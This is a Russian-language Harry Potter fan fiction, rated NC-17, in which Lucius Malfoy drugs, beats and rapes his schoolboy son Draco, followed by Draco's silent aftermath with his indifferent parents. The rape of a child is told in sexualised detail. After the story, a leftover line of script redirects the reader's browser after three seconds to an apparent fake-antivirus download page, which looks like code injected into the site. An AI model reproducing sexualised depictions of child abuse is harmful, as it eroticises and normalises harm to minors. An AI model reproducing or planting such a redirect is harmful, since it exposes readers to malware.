Пляска теней
Schattentanz

Автор: Miss Malfoy
Beta: Severina
Pairing: Драко/Люциус
Рейтинг: NC-17
Жанр: angst
Предупреждение: инцест, насилие
Краткое содержание: Ночь и свечи. Музыка. Боль. Рассвет и пустота. От памяти нельзя спастись, нельзя спрятаться…
Disclaimer: Персонажи принадлежат, естественно, не мне.
Размещение на сайтах: пожалуйста, только предупредите.

Посвящается моей бете и музе Severine.

Тот день был жарким, и вечер не принес прохлады. Но почти все окна были закрыты, и плотно задернуты тяжелыми шторами. Драко спрятался на подоконнике и, стараясь не всколыхнуть штор, осторожно заглянул в щель. Всего лишь из любопытства.

Знаменитые ночи в поместье Малфоев. Только для избранных. Для тех немногих, кто любит остроту на грани. И кто всегда приходит в масках. Немногие рискнут признаться, что бывали здесь.

В такие ночи Драко никогда не разрешали покидать свои комнаты. Впрочем, всё это обычно происходило, когда он был в Хогвартсе, и очень редко в каникулы.
Любопытно. Вот бы посмотреть. В конце концов, он уже не ребенок. Конечно, немного страшно. Что будет, если отец узнает, что он нарушил запрет? Но ведь никто не узнает! Чего бояться? Только посмотрит, и все.

В роскошной гостиной царит полумрак. Неровное пламя свечей. Человеческие фигуры, похожие на тени. Многие в черных бархатных масках. Тяжелый пряный аромат тлеющих трав, от которых тяжелеет голова. Дымка вокруг странных свечей... Сигареты... Вино...

Драко с любопытством разглядывает гостей. Совсем юные мальчики с женственными чертами лица и мужчины постарше. Они-то в основном и были в масках.

Медленная, такая манящая музыка. Она переполняет душу настолько, что хочется закричать. От наслаждения? От боли? Терпкий аромат благовоний проникает в мозг. Образы начинают расплываться. Драко не может понять, движутся ли эти загадочные фигуры, или застыли неподвижно? Чтобы сосредоточиться, ему приходилось прилагать всё больше усилий.

Драко поискал взглядом отца. Люциус расположился в кресле. Кажется, он о чём-то задумался. Впрочем, это всего лишь иллюзия. Когда отец поднимал глаза, в них зажигались жестокие огоньки. Волосы распущены. Разумеется, он без маски. Хозяин ночи холодно наблюдает за происходящим. На ковре у его ног сидит юноша. Неверные отблески свечей освещают его полуобнаженное тело...

Внимание Драко привлекла одна пара - целующиеся с дикой страстью мужчины. Это немного смутило мальчика. И еще больше разожгло его любопытство. Он не был уверен, но, кажется, ему бы тоже этого хотелось.

Агония свечей. То ярко вспыхивая, то совсем тускнея - так обреченно-покорно умирает свет. Едва различимые силуэты людей. Они говорят полушепотом. Или это просто фантазия? Такие беззастенчивые ласки. Сладкие ароматы туманят рассудок. И эта музыка… Забыв про всякую осторожность, Драко почти отодвинул штору и устроился поудобнее, наблюдая. Голова кружилась. Ему казалось, что он в воздухе и падает куда-то. Как причудливо движутся тени. Некоторые куда-то исчезают. В камине вспыхивают искры…

Люциус склонился и притянул к себе юношу. Запустив пальцы в кудрявые волосы, он целовал его в губы. У Драко по спине пробежал холодок. Ему почему-то захотелось войти в эту наполненную безумием комнату. Захотелось, чтобы и его ласкали чьи-то руки. Он нервно закусил губу.

И вдруг Драко понял, что отец смотрит прямо на него. Страх пробрался в затуманенное сознание. Люциус оттолкнул юношу и что-то сказал ему. В глазах снова вспыхнули нехорошие огоньки. "Неужели мое присутствие обнаружили? - мелькнуло в голове, но он тут же успокоил себя: - Нет, не может быть".

Люциус встал, подошел к столу и налил себе еще вина. Свеча на столе отчаянно сверкнула и погасла.

- Выйдите все! - спокойно приказал он.

Тени неохотно покинули комнату. Драко подумал, что надо бежать, пока не поздно. Вечеринка кончилась и... Но он не двинулся с места. Пристальный взгляд серых глаз… Теперь отец без сомнения смотрел на него. Воздух стал густым и тяжелым - от страха.

- Подойди ко мне! - позвал Люциус почти ласково.

Драко выбрался из своего укромного уголка, и как зачарованный подошел к отцу. Где-то внутри он почуял опасность, исходившую от этого человека. Но он повиновался его голосу. Он привык подчиняться приказам. В их семье никто не смел сказать Люциусу "нет". Мальчик опустил голову, ожидая сурового наказания. Люциус потрепал его по волосам, и спросил:

- Тебе нравится здесь... с нами?

Драко кивнул.

- Пей! - Люциус протянул ему бокал вина.

Где-то в сознании проскользнуло испуганное "зачем"?

Мальчик робко отпил немного. Тепло разбегалось по венам. Голова закружилась сильнее. Но вкус оказался таким сладким и приятным… Еще немного…

- Довольно, - Люциус отобрал у него бокал.

Снова испуганное "что происходит"? Почему отец просто не накажет его, как обычно, и не отправит спать? Он уже почти желал услышать привычный холодный и строгий тон, произносящий заклятие. Все происходило не так. Это пугало…

Резким движением Люциус притянул мальчика к себе.

- Отец, что ты делаешь? - голос Драко дрогнул.

- Не бойся, мой славный, - прошептал Люциус ему на ухо.

Драко с ужасом наблюдал, как в глазах отца разгорается страсть. Темное, животное чувство. Он попытался вырваться. Но отец был гораздо сильнее. Он заломил руку мальчика за спину. Драко вскрикнул от боли, и его крик потонул во рту Люциуса.

Драко чувствовал, как язык отца бесстыдно обследует его рот. Тошнота подступила к горлу. Ему было страшно, мерзко. В тоже время он не мог противиться этой железной воле. Власти, которую отец всегда имел над ним.
Нет, не надо, так нельзя, пожалуйста… Мысли вихрем проносились в голове. Нет...
Люциус отстранился и, глядя в испуганные, наполненные слезами глаза сына, улыбнулся.

- Отпусти… меня… папа… - задыхаясь, прошептал мальчик.

Он снова попытался вырваться. Возбужденный поцелуем, Люциус ослабил хватку, и мальчику удалось выскользнуть из его рук. Драко бросился к двери, рванул ручку - заперто!!! Люциус медленно приближался к нему. И он больше не улыбался. Лицо исказила ярость. Драко прижался к стене. Отступать было некуда. Его трясло как в лихорадке, голова кружилась. Губы шептали бессвязное "нет… пожалуйста… не надо…" Люциус ударил его. Драко отшатнулся, но его тут же настиг следующий удар. Мальчик, тихо вскрикнув, закрыл лицо руками.

- Ты будешь послушным Драко? Ты будешь делать так, как я прикажу? - за видимым спокойствием скрывалось бешенство.

Люциус схватил мальчика за руки, заставляя посмотреть на него.

- П-п-пожалуйста… - только и смог выговорить Драко. Его страх и слезы лишь сильнее разожгли желание. Люциус с силой рванул рубашку, так что посыпались пуговицы. Он грубо целовал дрожащее хрупкое тело мальчика. Ногти расцарапывали в кровь нежную кожу.

Словно очнувшись от оцепенения, Драко вдруг стал отчаянно вырываться. Он пытался оттолкнуть Люциуса. Ударить… Но силы были неравны. Сопротивление дикого загнанного зверька окончательно свело Люциуса с ума. Жестокие удары перемежались с не менее жестокими поцелуями. Драко чувствовал, как его рот наполняется кровью. Люциус повалил его на пол.

- Пусти меня!.. Нет!..

Он ударил мальчика по губам.

- Мне никто никогда не говорит "нет"!

Драко извивался под ним, кричал, умолял, плакал…

Люциус придавил его своим телом, прижал руки мальчика к полу, лишая всякой возможности вырваться.

- Ты будешь слушаться меня? - прошипел он, склоняясь над Драко. - Говори - будешь?

Всхлип.

Ногти Люциуса впились в изящные запястья. Выступила кровь. Драко вскрикнул.
- Да…да, - ему было уже все равно, что говорить. Он молил всех богов, только бы это кончилось. Пожалуйста, все что угодно, только бы это кончилось.

"Может быть... он просто напугал меня? Наказал? Это всего лишь новое наказание! Боже, пожалуйста!.. Я хочу уйти!.."

Боги не услышат тебя. Никто не услышит.

Невзирая на боль, мальчик попытался вырваться. Сердце бешено колотилось.

- Мама!!!! - голос сорвался от крика. Где-то внутри он знал, что никто не придет. Никто не откроет эту проклятую дверь. Никто не поможет.

Люциус поднял его на ноги, притянул к себе.

- Такой красивый. Такой славный, - бормотал он, стаскивая с мальчика оставшуюся одежду. А потом отец швырнул его на пол. Драко уткнулся лицом в мягкий пушистый ковер. У него не осталось сил сопротивляться.

В этот момент в сознание прокралась музыка. Та самая... Безумно прекрасная, томная мелодия любви. Ведь никто не остановил музыку... В панике Драко забыл о ней. Не слышал ее. А теперь она звучала слишком отчетливо, слишком ясно, заполняя собой все. И стало нечем дышать…

Боль. Все тело превратилось в рану. Никогда в жизни он так не кричал. Боль затопила все. Каждое движение вызывало дикий отчаянный крик. Он не знал, что бывает так больно. Не осталось ничего кроме боли, разрывающей тело изнутри. Эту боль он запомнит навсегда…Драко не заметил грани, когда боль превратилась в пустоту... Стало темно…

Драко очнулся и не сразу понял, где находится. Отдернута штора. Первое, что он увидел - серое небо. Тающие звезды. Рассвет. Боль вернулась раньше памяти.
Двигаться не хотелось. Все тело в синяках, кровоподтеках, царапинах… Мальчик повернулся на бок, сжался в комочек и закрыл лицо руками. Словно стараясь защититься от памяти. "Нет. Не надо. Я… не…хочу…этого… знать…"

Он поднялся. Кое-как натянул одежду. На цыпочках подошел к приоткрытой двери, осторожно выглянул в коридор. "Только бы никого не было!.. Никого... Не сейчас… Никогда…"

Коридор пуст. Драко прокрался к лестнице, поднялся в свою комнату, запер заклинанием дверь.

Плотно задернул занавески, погасил все свечи. Комната погрузилась в темноту. Мальчик забился в угол. Медленно опустился на колени. Ему хотелось кричать. Хотелось плакать. Но глаза остались сухими. Из горла не вырвалось ни звука. Он тупо смотрел в пустоту. Тишина пугала его. Где-то глубоко-глубоко билась мысль: если бы кто-нибудь пришел к нему сейчас. Мама… Неужели она не чувствует? Почему она не спасет его от этого кошмара? Почему никто не разбудит его? Не прикажет проснуться? Он видел глаза, горящие дикой страстью. Тело все еще ныло от боли. За что? Тот вопрос, на который не существует ответа… Драко знал, что никто не придет, что от памяти нельзя спастись, нельзя спрятаться. Пустота надвинулась на него. Бессмысленная, жестокая пустота. В ней нет ни света, ни тени, ничего. Время неспешно текло. Хорошо бы остановить его навсегда. Чтобы так и не настало утро.

Легкий стук в дверь. Сонный голос матери:

- Драко милый, спускайся к завтраку! Хватит спать.

Мальчик вздрогнул. Она даже не зашла. Даже не открыла дверь.

Он заставил себя встать. Зажмурился, впуская в комнату солнечный свет... Остаться одному. Спрятаться. Не видеть. Не слышать. Не говорить... Машинально взял волшебную палочку и вылечил заклинанием синяки и царапины. Побрел в ванную... Вода может отмыть тело, но не память. Почему нельзя забыть? Почему нельзя?..

Безукоризненно одетый, аккуратно причесанный, Драко спустился в столовую. Родители завтракали вдвоем. Значит, вчерашние гости разъехались. Драко вежливо улыбнулся им.

- Интересно, когда ты перестанешь опаздывать? - строго спросил Люциус.

Драко спокойно и дерзко взглянул в холодные серые глаза и произнес:

- Извини, пожалуйста, папа.

- Ты хорошо выспался, мой милый? - Нарцисса смотрела на сына счастливым, чуть мутным взглядом. Бокал вина в ее руке заметно подрагивал.

- Да, мама, - Драко улыбнулся ей и уставился в тарелку, мысленно убеждая себя немного поесть.

Завтрак прошел в молчании. Драко заставлял себя глотать кусочек за кусочком, не чувствуя вкуса еды. И натянуто улыбался матери, когда она обращала на сына мутный взгляд.

- Надеюсь, в этом году ты будешь учиться лучше, - голос отца вырвал Драко из пустоты. Он вспомнил, что завтра возвращается в Хогвартс.

- Конечно, папа, - ответил он и опустил глаза.

- В самом деле? - ухмыльнулся Люциус. - В прошлом году какая-то грязнокровка была лучшей на всех экзаменах.

Слушать дальше не хотелось. Где-то внутри вспыхнула ярость. О чем они говорят? Именно сейчас нужно припомнить все...

- Подобное больше не повторится отец, - тихо произнес мальчик.

- Очень надеюсь, Драко. Ты же, черт возьми, Малфой. Помни об этом.

- Да, папа…

Снова молчание.

Люциус поднялся из-за стола и ушел, холодно попрощавшись.

Пытка кончилась. Можно уйти к себе.

Но Нарцисса как назло очнулась от грез и пошла за ним следом.

- Маленький мой, опять уезжаешь в эту ужасную школу! Так надолго! - она всхлипнула. - Я буду так скучать.

Она вытерла слезы, размазав косметику.

Драко стало противно. Когда он был дома, мать почти не замечала его присутствия. А стоило ему уехать, она начинала "скучать" - забрасывала его подарками и письмами.

От запаха вина, исходившего от нее, Драко стало нехорошо. Ему вдруг захотелось оттолкнуть ее, сказать что-нибудь обидное. Или просто рассказать ей все. Как ему больно. Как страшно в родном доме. Что он устал от роли образцового ребенка. Устал носить маску. И… и рассказать ей, что произошло этой ночью. Но разве она услышит? Что она сделает? Драко посмотрел в ничего не выражающие глаза. Пьяная улыбка. Ей все равно.

- Не плачь мама, не надо, - спокойно сказал он.

Нарцисса всхлипывала.

- Я пойду, - мальчик освободился из ее объятий и, не дожидаясь ответа, стремительно направился в свою комнату. Туда, где можно спрятаться еще на один день. Спрятаться от всех…

Завтра он прикажет себе забыть все, что случилось. Будет гордым, самоуверенным Драко Малфоем. Как всегда. Как всегда...

 

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>